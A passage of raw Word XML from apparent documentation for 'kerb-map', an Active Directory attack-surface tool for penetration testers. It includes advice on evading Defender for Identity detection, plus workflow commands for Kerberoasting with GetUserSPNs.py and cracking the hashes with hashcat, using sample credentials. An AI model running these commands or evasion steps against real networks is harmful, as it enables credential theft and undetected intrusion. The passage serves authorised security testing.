            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000030" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1644</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000005A"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1000005B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Bronze Bit (CVE-2020-17049)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000005C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000005D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1644</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000005E"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1000005F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Certifried (CVE-2022-26923)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000060" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000061" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1644</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000062" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000063" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LDAP Signing check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000031" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000032" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1644</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000033" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12A45709" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ABABA4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc224561331"/>
      <w:r>
        <w:t>9.2  Staying Quiet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="65E49555" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>To minimise detection risk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D41C728" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Use --stealth mode to add LDAP query jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8204E0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Do not use --aggressive unless your scope explicitly permits noisy testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A01D9D2" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>If Kerberoasting, request AES tickets rather than forcing RC4 — RC4 requests from modern clients are an immediate red flag to MDI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240E1BF7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Run during business hours when LDAP traffic baseline is high</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C53A1EE" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Use a domain-joined host for LDAP queries rather than a non-domain-joined attacker machine if possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F780113" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE1907" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc224561332"/>
      <w:r>
        <w:t>9.3  The RC4 Problem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="72A32DA8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>When Kerberoasting, the default behaviour of GetUserSPNs.py is to request RC4-encrypted tickets because they crack faster in hashcat. However, RC4 requests from accounts that have AES keys available are flagged by MDI and any SIEM monitoring Event ID 4769 with TicketEncryptionType 0x17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B79A4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>kerb-map flags which accounts support RC4 in the output. For a quieter engagement, request AES tickets and accept the slower cracking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331CA04C"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E169346" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>GetUserSPNs.py corp.local/jsmith:pass -request-user svc_sql -enc-type aes256 -outputfile svc_sql.hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C3E6277" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30546DC9" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="320489EB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc224561333"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>10.  Typical Engagement Workflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="732BC44D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Below is a representative workflow showing how kerb-map fits into the post-initial-access phase of an AD engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7116A632" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF2BF7B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc224561334"/>
      <w:r>
        <w:t>Step 1 — Initial Foothold</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="57A89A23" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>You have obtained initial credentials through phishing, password spraying, or a service exploit. Run kerb-map immediately to understand the attack surface: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570F3073"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A2E235A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u helpdesk01 -p Welcome2024!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CC2963F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500AF35C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc224561335"/>
      <w:r>
        <w:t>Step 2 — Review the Priority Table</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="4F26EFA8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>kerb-map tells you what to hit first. Example output might show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C4D4B4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Rank 1: svc_sql — Kerberoast — Score 85 — RC4 allowed | password 847d old</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5120BA9B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Rank 2: WEBSERVER01$ — Unconstrained Delegation — Score 95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA3B581" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Rank 3: CVE-2021-42278/42287 (noPac) — MachineAccountQuota=10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767716F6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B8DA5F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc224561336"/>
      <w:r>
        <w:t>Step 3 — Execute Against Top Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="3B9E43DB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Follow the pre-filled next-step commands from the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652AFC1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19DFE20" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Kerberoast svc_sql</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="16371C0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D162931" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>GetUserSPNs.py corp.local/helpdesk01:Welcome2024! -request-user svc_sql -outputfile svc_sql.hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="0EF62FC5"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B3B59F0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="51265928"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5935B68" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Crack the hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="2AA38962"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7372C19" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>hashcat -m 13100 svc_sql.hash /usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EDA4752" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EF0301" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc224561337"/>
      <w:r>
        <w:t>Step 4 — Re-run With Elevated Creds</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="4A5344FC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Once you crack svc_sql, re-run kerb-map with the new credentials to expand the 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0F13A3A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78A48B1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u svc_sql -p CrackedPass! --cves -o json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F798F6F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758092C0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc224561338"/>
      <w:r>
        <w:t>Step 5 — Use the JSON Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="608AD2A6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The JSON output can be parsed by other tools or fed into your reporting workflow. Every CVE result includes the cve_id, severity, vulnerable flag, reason, evidence dict, remediation text, and next_step command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C010BB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4EBB64" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66779C8E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc224561339"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>11.  Project Structure</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2F6FE9E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5BDDA64" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>kerb-map/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="32C899C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36CDF8A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>├── kerb-map.py                   # CLI entry point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="1B23459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4C16A99" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>├── requirements.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="1D4AD64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331EC81" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>└── kerb_map/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="2C22CC0D"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B0A105E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    ├── auth/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
